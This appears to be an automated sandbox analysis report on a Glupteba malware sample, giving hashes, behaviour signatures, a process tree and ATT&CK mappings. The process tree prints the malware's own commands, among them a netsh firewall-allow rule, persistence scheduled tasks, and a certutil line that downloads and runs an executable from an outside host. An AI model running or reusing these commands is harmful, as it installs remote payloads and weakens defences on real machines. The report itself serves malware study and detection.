Analysis

  • max time kernel
    181s
  • max time network
    180s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
  • submitted
    29-01-2023 16:20

General

  • Target

    a11462c9d1e545b9a3172327282f1a30b801236ce4fef2b8a4149845ef1e4409.exe

  • Size

    4.0MB

  • MD5

    e006b2b08833a38314bad962b8e549eb

  • SHA1

    289e9b527460258ce38402604b82ab1784b93229

  • SHA256

    a11462c9d1e545b9a3172327282f1a30b801236ce4fef2b8a4149845ef1e4409

  • SHA512

    2a4f4e47c909abfd6a59a38536b357d7ff84177094897ea2819fd87dfc07b239061395ce3fd5ffbbf14a2d709b34691f975adf598b7e89ee6b607289d0b87e03

  • SSDEEP

    98304:rGCKnQtyq51ek1S7mP13ds372CfpMyc61mEy6Ti9Hvti2:rzKfS1ehmd3IZfpJc6HLTOHvp

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 9 IoCs
  • Windows security bypass 2 TTPs 12 IoCs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Windows security modification 2 TTPs 12 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in Windows directory 3 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a11462c9d1e545b9a3172327282f1a30b801236ce4fef2b8a4149845ef1e4409.exe
    "C:\Users\Admin\AppData\Local\Temp\a11462c9d1e545b9a3172327282f1a30b801236ce4fef2b8a4149845ef1e4409.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:1924
    • C:\Users\Admin\AppData\Local\Temp\a11462c9d1e545b9a3172327282f1a30b801236ce4fef2b8a4149845ef1e4409.exe
      "C:\Users\Admin\AppData\Local\Temp\a11462c9d1e545b9a3172327282f1a30b801236ce4fef2b8a4149845ef1e4409.exe"
      2⤵
      • Windows security bypass
      • Loads dropped DLL
      • Windows security modification
      • Adds Run key to start application
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:596
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1068
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
          • Modifies Windows Firewall
          • Modifies data under HKEY_USERS
          PID:884
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe ""
        3⤵
        • Executes dropped EXE
        PID:1856
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          4⤵
          • Creates scheduled task(s)
          PID:1732
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://10gamestop.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
          4⤵
          • Creates scheduled task(s)
          PID:1716
  • C:\Windows\system32\makecab.exe
    "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20230129172225.log C:\Windows\Logs\CBS\CbsPersist_20230129172225.cab
    1⤵
    • Drops file in Windows directory
    PID:1932

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scheduled Task

1
T1053

Persistence

Modify Existing Service

1
T1031

Registry Run Keys / Startup Folder

1
T1060

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Disabling Security Tools

2
T1089

Modify Registry

3
T1112

Discovery

Query Registry

1
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Windows\rss\csrss.exe
    Filesize

    4.0MB

    MD5

    e006b2b08833a38314bad962b8e549eb

    SHA1

    289e9b527460258ce38402604b82ab1784b93229

    SHA256

    a11462c9d1e545b9a3172327282f1a30b801236ce4fef2b8a4149845ef1e4409

    SHA512

    2a4f4e47c909abfd6a59a38536b357d7ff84177094897ea2819fd87dfc07b239061395ce3fd5ffbbf14a2d709b34691f975adf598b7e89ee6b607289d0b87e03

  • \Windows\rss\csrss.exe
    Filesize

    4.0MB

    MD5

    e006b2b08833a38314bad962b8e549eb

    SHA1

    289e9b527460258ce38402604b82ab1784b93229

    SHA256

    a11462c9d1e545b9a3172327282f1a30b801236ce4fef2b8a4149845ef1e4409

    SHA512

    2a4f4e47c909abfd6a59a38536b357d7ff84177094897ea2819fd87dfc07b239061395ce3fd5ffbbf14a2d709b34691f975adf598b7e89ee6b607289d0b87e03

  • \Windows\rss\csrss.exe
    Filesize

    4.0MB

    MD5

    e006b2b08833a38314bad962b8e549eb

    SHA1

    289e9b527460258ce38402604b82ab1784b93229

    SHA256

    a11462c9d1e545b9a3172327282f1a30b801236ce4fef2b8a4149845ef1e4409

    SHA512

    2a4f4e47c909abfd6a59a38536b357d7ff84177094897ea2819fd87dfc07b239061395ce3fd5ffbbf14a2d709b34691f975adf598b7e89ee6b607289d0b87e03

  • memory/596-61-0x0000000004870000-0x0000000004C17000-memory.dmp
    Filesize

    3.7MB

  • memory/596-70-0x0000000000400000-0x0000000002FDF000-memory.dmp
    Filesize

    43.9MB

  • memory/596-62-0x0000000000400000-0x0000000002FDF000-memory.dmp
    Filesize

    43.9MB

  • memory/596-60-0x0000000004870000-0x0000000004C17000-memory.dmp
    Filesize

    3.7MB

  • memory/884-64-0x0000000000000000-mapping.dmp
  • memory/884-65-0x000007FEFC0B1000-0x000007FEFC0B3000-memory.dmp
    Filesize

    8KB

  • memory/1068-63-0x0000000000000000-mapping.dmp
  • memory/1856-71-0x00000000048B0000-0x0000000004C57000-memory.dmp
    Filesize

    3.7MB

  • memory/1856-68-0x0000000000000000-mapping.dmp
  • memory/1856-72-0x00000000048B0000-0x0000000004C57000-memory.dmp
    Filesize

    3.7MB

  • memory/1856-73-0x0000000004C60000-0x0000000005356000-memory.dmp
    Filesize

    7.0MB

  • memory/1856-74-0x0000000000400000-0x0000000002FDF000-memory.dmp
    Filesize

    43.9MB

  • memory/1856-75-0x0000000000400000-0x0000000002FDF000-memory.dmp
    Filesize

    43.9MB

  • memory/1924-54-0x0000000004840000-0x0000000004BE7000-memory.dmp
    Filesize

    3.7MB

  • memory/1924-58-0x0000000000400000-0x0000000002FDF000-memory.dmp
    Filesize

    43.9MB

  • memory/1924-57-0x0000000000400000-0x0000000002FDF000-memory.dmp
    Filesize

    43.9MB

  • memory/1924-56-0x0000000004BF0000-0x00000000052E6000-memory.dmp
    Filesize

    7.0MB

  • memory/1924-55-0x0000000004840000-0x0000000004BE7000-memory.dmp
    Filesize

    3.7MB

  • memory/1924-59-0x0000000000400000-0x0000000002FDF000-memory.dmp
    Filesize

    43.9MB